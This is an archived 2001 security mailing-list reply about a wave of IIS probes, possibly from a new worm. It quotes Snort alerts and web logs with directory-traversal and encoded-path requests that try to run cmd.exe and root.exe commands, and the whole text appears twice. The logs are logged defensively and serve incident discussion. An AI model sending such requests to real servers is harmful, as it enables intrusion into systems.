Mailinglist Archive: opensuse-security (556 mails)
| < Previous | Next > |
Re: [suse-security] WEB IIS cmd exe requests
- From: Eric Mueller <eric.mueller@xxxxxxx>
- Date: Tue, 18 Sep 2001 17:17:30 +0200
- Message-id: <3BA7658A.3BE89FE2@xxxxxxx>
Same here ..., so :
1) it's not you
2) we have logged around 220 tries from 100 different IP's since 15:00 CEST today.
I guess its a new worm that uses CRII-infected servers as base infrastructure.
Eric
Togan Muftuoglu wrote:
Togan Muftuoglu wrote:
> Hi,
>
> I thought Code RED was slowing down :-( Other then getting the regular
> GET "default.ida" requests I have been logging things like this for the
> last two hours from different IP's.
>
> 1) Anyone else getting similar things or is me ?
> 2) Is it worth to bother sending these logs to the provider of the ip's ?
>
> TIA
>
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:39 gardiyan last message repeated 3 times
>
> ::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
>
> --
> Togan Muftuoglu
>
> --
> To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> For additional commands, e-mail: suse-security-help@xxxxxxxx
--
-----------------------------------------------
| Eric Mueller
| E.Solutions Central Europe
| Solutions Consulting
| EDS Informationstechnologie und Service GmbH
| Eisenstr. 56
| 65428 Ruesselsheim, Germany
-----------------------------------------------
1) it's not you
2) we have logged around 220 tries from 100 different IP's since 15:00 CEST today.
I guess its a new worm that uses CRII-infected servers as base infrastructure.
Eric
Togan Muftuoglu wrote:
Togan Muftuoglu wrote:
> Hi,
>
> I thought Code RED was slowing down :-( Other then getting the regular
> GET "default.ida" requests I have been logging things like this for the
> last two hours from different IP's.
>
> 1) Anyone else getting similar things or is me ?
> 2) Is it worth to bother sending these logs to the provider of the ip's ?
>
> TIA
>
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:39 gardiyan last message repeated 3 times
>
> ::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
>
> --
> Togan Muftuoglu
>
> --
> To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> For additional commands, e-mail: suse-security-help@xxxxxxxx
--
-----------------------------------------------
| Eric Mueller
| E.Solutions Central Europe
| Solutions Consulting
| EDS Informationstechnologie und Service GmbH
| Eisenstr. 56
| 65428 Ruesselsheim, Germany
-----------------------------------------------
| < Previous | Next > |